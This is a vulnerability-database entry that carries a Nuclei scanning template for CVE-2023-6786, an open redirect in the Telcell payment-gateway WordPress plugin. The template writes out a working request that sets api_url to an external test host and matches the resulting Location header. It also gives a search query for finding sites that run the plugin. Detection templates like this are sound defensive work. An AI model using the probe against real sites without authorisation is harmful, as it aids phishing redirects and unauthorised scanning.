Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-6786
HistoryJun 10, 2024 - 8:16 p.m.

Payment Gateway for Telcell < 2.0.4 - Open Redirect

2024-06-1020:16:24
ProjectDiscovery
github.com
2
cve-2023 wordpress wp-plugin redirect security telcell payment-gateway

6.8 Medium

AI Score

Confidence

High

0 Low

EPSS

Percentile

0.0%

The plugin does not validate the api_url parameter before redirecting the user to its value, leading to an Open Redirect issue
id: CVE-2023-6786

info:
  name: Payment Gateway for Telcell < 2.0.4 - Open Redirect
  author: securityforeveryone
  severity: medium
  description: |
    The plugin does not validate the api_url parameter before redirecting the user to its value, leading to an Open Redirect issue
  remediation: |
    Fixed in 2.0.4
  reference:
    - https://wpscan.com/vulnerability/f3e64947-3138-4ec4-86c4-27b5d6a5c9c2/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6786
  classification:
    cve-id: CVE-2023-6786
  metadata:
    max-request: 1
    verified: true
    publicwww-query: "/wp-content/plugins/payment-gateway-for-telcell"
  tags: cve,cve2023,wordpress,redirect,wp-plugin,wp,payment-gateway-for-telcell

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin.php?page=wc-settings&action=redirect_telcell_form&api_url=https://oast.me"

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'
# digest: 4a0a00473045022100c54d339267c2f658fd113dc4fd0acbaeaa55f4b62b90801f44b112a81c3526450220443bf6993f842ca3211aebb721c05472fee7856743f6d1b666eb06e7ad644eba:922c64590222798bb761d5b6d8e72950

6.8 Medium

AI Score

Confidence

High

0 Low

EPSS

Percentile

0.0%

Related for NUCLEI:CVE-2023-6786